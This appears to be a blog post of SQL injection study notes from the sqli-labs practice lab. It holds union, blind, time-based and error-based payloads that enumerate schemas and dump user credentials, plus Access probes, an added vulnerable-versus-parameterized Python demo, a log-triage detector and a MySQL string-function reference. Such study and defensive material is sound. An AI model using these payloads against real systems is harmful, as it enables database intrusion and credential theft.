Safety notes
2022-07-06 09:52:00 【XRSec】
Enumerate databases:
select schema_name from information_schema.schemata
Enumerate tables:
select table_name from information_schema.tables where table_schema='security'
Enumerate columns:
select column_name from information_schema.columns where table_name='users'
Dump fields:
select username,password from security.users
sqli-labs practice
less-01: SELECT * FROM users WHERE id='1' LIMIT 0,1;
In LIMIT 0,1 the first number is the starting offset (0 means start from the first row) and the second number is how many rows are returned.
Payload: SELECT * FROM users WHERE id='1' or 1=1-- ' LIMIT 0,1
Comment terminators: --+ , -- , #
Logic: A and B is true only when both are true; A or B is true when either one is true.
With id=1' the query becomes SELECT * FROM users WHERE id='1''. less-01 has 3 columns in the data.
Useful functions: system_user(), user(), current_user(), database(), version(), @@datadir, @@version_compile_os, group_concat(), concat_ws('~',A,B) -> A~B
Databases: information_schema, challenges, mysql, performance_schema, security, test
Tables in security: emails, referers, uagents, users
Columns in users: id, username, password
group_concat(concat_ws(0x7e,username,password)) from security.users   # concat_ws(0x7e,username,password) gives admin~password,admin1~pass, ...
Parameter wrapping forms: '1' , 1 , ('1')
less-5 (boolean blind):
select ascii(substr((select database()),1,1));
select database();  -> security
select ascii(substr('security',1,1));  -> same as select ascii('s') -> 115
burpsuite: use the proxy (security crow_1)
if length(select database()) =8;
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 0x7365637572697479 limit 1,1),1,1))> 10--+
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >1000--+
ascii(substr((select database()),1,1))> 156 : for security, narrow the value by binary search (dichotomy) over 1..156, e.g. trying 100 first
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) > 10--+   -> the value found is 99
Building up the if() probe step by step: select database() -> substr((select database()),1,1) -> ascii(substr((select database()),1,1)) -> select if(ascii(substr((select database()),1,1)) > 10, 2,3);
sqli-labs less01-less10: the MySQL enumeration queries are the same four listed above (schemata, tables, columns, fields).
less-11 (POST):
select 1=1 and 1=2; select 1=1 or 1=2;
uname=n' union select 1, schema_name from information_schema.schemata limit 1,1#&passwd=admin&submit=Submit
uname=n' union select 1, group_concat(schema_name) from information_schema.schemata #&passwd=admin&submit=Submit   -> security
uname=n' union select 1, group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=admin&submit=Submit
Summary: less-1 uses GET, less-11 uses POST. Closing forms to try: ' ') ')) " ") "))
select * from users where user_id = '1';
select * from users where user_id = '1111 ' or 1=1 #
select database();
group_concat(concat(0x7e,username,password)) from security.users   -> ~username~password
less-13:
select length(database());
if() combined with length: if(length(database())>1,1,sleep(5));
The database name is 8 characters long.
left(database(),1)='a'
uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a' #&passwd=admin&submit=Submit
Character set to walk for names: A-Z, 0-9, _
less-14:
uname=admin " or length(database())='8'#&passwd=admin&submit=Submit
A or B / A and B
uname=ain" or left((select schema_name from information_schema.schemata limit 0,1),1)='u' #&passwd=admin&submit=Submit
uname=adin " or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&passwd=admin&submit=Submit
uname=adin " or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='a'#&passwd=admin&submit=Submit
less-15:
uname=admin&passwd=a' or length(database())='8'#&submit=Submit
less-16:
Closing forms by lesson: 13 ('ain') , 14 "admin" , 15 'ain' , 16 ("admin")
uname=admin&passwd=admin") and 1=2#&submit=Submit
less-17 (error based):
uname=admin&passwd=afafa'#&submit=Submit
select updatexml(1,concat(0x7e,(database())),1);
select updatexml(1,concat(0x7e,( constructed subquery )),1);
The four enumeration queries above (schemata, tables, columns, fields) are wrapped in updatexml, for example:
and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1)
less-18 (insert into uagents):
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('Mn.0', '127.0.0.1', 'admin')
' or updatexml(1,concat(0x7e,()),1);
select updatexml(1,concat(0x7e,(database())),1);
' or updatexml(1,concat(0x7e,(database())),1) or '1'='1
' or updatexml(1,concat(0x7e,(database())),1), '','')#
' or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select username from security.users limit 0,1)),1), '','')#
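As an added example (not from the original notes), the less-01 query shape rebuilt in Python over an in-memory SQLite table, with the string-pasted version beside the parameterized fix: the `1' or 1=1-- ` input from the notes returns every row from the first and nothing from the second. SQLite stands in for MySQL here, and the table rows are constructed sample values.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the sqli-labs security.users table (sample rows only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "password"), (2, "admin1", "pass"), (3, "dumb", "dumb")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """The less-01 shape: the id is pasted into the SQL text, so a quote and a
    comment marker in the input rewrite the statement (LIMIT 0,1 gets commented out)."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    """Same query with a bound parameter: the value travels separately from the
    statement text, so it can only ever be compared as a literal id."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "1' or 1=1-- "  # the less-01 payload from the notes
    print(lookup_vulnerable(conn, "1"))         # one row
    print(lookup_vulnerable(conn, payload))     # all three rows
    print(lookup_parameterized(conn, payload))  # no rows
```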
Hexadecimal: write 0x followed by the hex-encoded bytes (for example 0x7e for '~').
Manual injection
2%'and(select count(*)from mssysaccessobjects)>0 and '%'='        // page returns normally: Access database
2%'and(select count(*)from admin_user)>0 and '%'='                // page returns normally: table admin_user exists
2%'and(select count(username)from admin_user)>0 and '%'='         // page returns normally: column username exists
2%'and(select count(password)from admin_user)>0 and '%'='         // page returns normally: column password exists
2%'and(select top 1 len(admin)from admin_user)>4 and '%'='        // page returns normally: username length is greater than 4
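An added log-triage example (not part of the original notes): it URL-decodes constructed access-log lines shaped like the Less-5 URLs and the Access probes above and tags each line with the payload family it matches. The rule names, the regular expressions and the sample lines are my own, and the rules are illustrative rather than a complete signature set.

```python
import re
from urllib.parse import unquote_plus

# Indicator families derived from the payload shapes in the notes above (illustrative only).
RULES = {
    "schema-enum":   re.compile(r"information_schema\.(schemata|tables|columns)", re.I),
    "error-based":   re.compile(r"\bupdatexml\s*\(", re.I),
    "boolean-blind": re.compile(r"\b(ascii|left)\s*\(", re.I),
    "time-based":    re.compile(r"\bsleep\s*\(", re.I),
    "access-probe":  re.compile(r"mssysaccessobjects|select\s+top\s+1\s+len\s*\(", re.I),
}


def normalize(raw: str) -> str:
    """URL-decode twice (catches %2527-style double encoding) and fold whitespace,
    so the regexes see roughly what the database parser would have seen."""
    text = unquote_plus(unquote_plus(raw))
    return re.sub(r"\s+", " ", text)


def classify(line: str) -> list:
    """Return the indicator families that match one access-log line, in RULES order."""
    text = normalize(line)
    return [name for name, rx in RULES.items() if rx.search(text)]


def triage(lines) -> list:
    """Return (line_number, families) for every line that matched at least one rule."""
    hits = []
    for n, line in enumerate(lines, start=1):
        families = classify(line)
        if families:
            hits.append((n, families))
    return hits


# Constructed sample lines in combined-log format, modelled on the Less-5 URLs in the notes.
SAMPLE_LOG = [
    '127.0.0.1 - - [06/Jul/2022:09:52:00 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 715',
    '127.0.0.1 - - [06/Jul/2022:09:52:05 +0800] "GET /sqli/Less-5/?id=1%27%20and%20ascii(substr((select%20database()),1,1))%3E100--+ HTTP/1.1" 200 715',
    '127.0.0.1 - - [06/Jul/2022:09:52:09 +0800] "GET /sqli/Less-5/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%201,1),1,1))%3E10--+ HTTP/1.1" 200 715',
    '127.0.0.1 - - [06/Jul/2022:09:52:14 +0800] "GET /sqli/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,(database())),1)--+ HTTP/1.1" 200 1034',
    '127.0.0.1 - - [06/Jul/2022:09:52:20 +0800] "GET /sqli/Less-5/?id=1%27%20and%20if(length(database())%3E1,1,sleep(5))--+ HTTP/1.1" 200 715',
]

if __name__ == "__main__":
    for n, families in triage(SAMPLE_LOG):
        print(n, ", ".join(families))
```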
Usage of concat(), concat_ws() and group_concat() in MySQL
I. CONCAT() function
The CONCAT() function joins several strings into one string. Using the table info as an example, the statement SELECT id,name FROM info LIMIT 1; returns
+----+--------+
| id | name   |
+----+--------+
|  1 | BioCyc |
+----+--------+
1. Syntax and usage:
CONCAT(str1,str2,…)
Returns the string formed by concatenating the arguments. If any argument is NULL, the result is NULL. There can be one or more arguments.
2. Examples:
SELECT CONCAT(id, ',', name) AS con FROM info LIMIT 1;
The return result is
+----------+
| con      |
+----------+
| 1,BioCyc |
+----------+
SELECT CONCAT('My', NULL, 'QL');
The return result is
+--------------------------+
| CONCAT('My', NULL, 'QL') |
+--------------------------+
| NULL                     |
+--------------------------+
3. Specifying the separator between arguments
Use the function CONCAT_WS(). The syntax is: CONCAT_WS(separator,str1,str2,…)
CONCAT_WS() stands for CONCAT With Separator and is a special form of CONCAT(). The first argument is the separator for the remaining arguments; it is placed between each pair of strings being joined. The separator can be a string or another argument. If the separator is NULL, the result is NULL. The function skips any NULL value that follows the separator argument; CONCAT_WS() does not skip empty strings, but it does skip all NULLs.
For example SELECT CONCAT_WS('_',id,name) AS con_ws FROM info LIMIT 1;
The return result is
+----------+
| con_ws   |
+----------+
| 1_BioCyc |
+----------+
SELECT CONCAT_WS(',','First name',NULL,'Last Name');
The return result is
+----------------------------------------------+
| CONCAT_WS(',','First name',NULL,'Last Name') |
+----------------------------------------------+
| First name,Last Name                         |
+----------------------------------------------+
II. GROUP_CONCAT() function
GROUP_CONCAT returns a string result made by concatenating the values within a group. Using the table info as an example, the statement
SELECT locus,id,journal FROM info WHERE locus IN('AB086827','AF040764');
returns
+----------+----+-------------------------+
| locus    | id | journal                 |
+----------+----+-------------------------+
| AB086827 |  1 | Unpublished             |
| AB086827 |  2 | Submitted (20-JUN-2002) |
| AF040764 | 23 | Unpublished             |
| AF040764 | 24 | Submitted (31-DEC-1997) |
+----------+----+-------------------------+
1. Syntax and usage:
GROUP_CONCAT([DISTINCT] expr [,expr ...] [ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] [,col ...]] [SEPARATOR str_val])
In MySQL this returns the concatenated values of the expression combination. Duplicate values can be excluded with DISTINCT. To sort the values in the result, use an ORDER BY clause. SEPARATOR is a string value inserted between the result values; the default is a comma (","), and specifying SEPARATOR "" removes the separator entirely. A maximum length can be set through the variable group_concat_max_len. The syntax executed at run time is: SET [SESSION | GLOBAL] group_concat_max_len = unsigned_integer;
If a maximum length is set, the result value is truncated to that length. If the grouped string is too long, the system parameter can be raised with: SET @@global.group_concat_max_len=40000;
2. Examples:
Statement: SELECT locus,GROUP_CONCAT(id) FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;
The return result is
+----------+------------------+
| locus    | GROUP_CONCAT(id) |
+----------+------------------+
| AB086827 | 1,2              |
| AF040764 | 23,24            |
+----------+------------------+
Statement: SELECT locus,GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;
The return result is
+----------+----------------------------------------------------------+
| locus    | GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') |
+----------+----------------------------------------------------------+
| AB086827 | 2_1                                                      |
| AF040764 | 24_23                                                    |
+----------+----------------------------------------------------------+
Statement: SELECT locus,GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;
The return result is
+----------+--------------------------------------------------------------------------+
| locus    | GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') |
+----------+--------------------------------------------------------------------------+
| AB086827 | 2, Submitted (20-JUN-2002). 1, Unpublished                               |
| AF040764 | 24, Submitted (31-DEC-1997). 23, Unpublished                             |
+----------+--------------------------------------------------------------------------+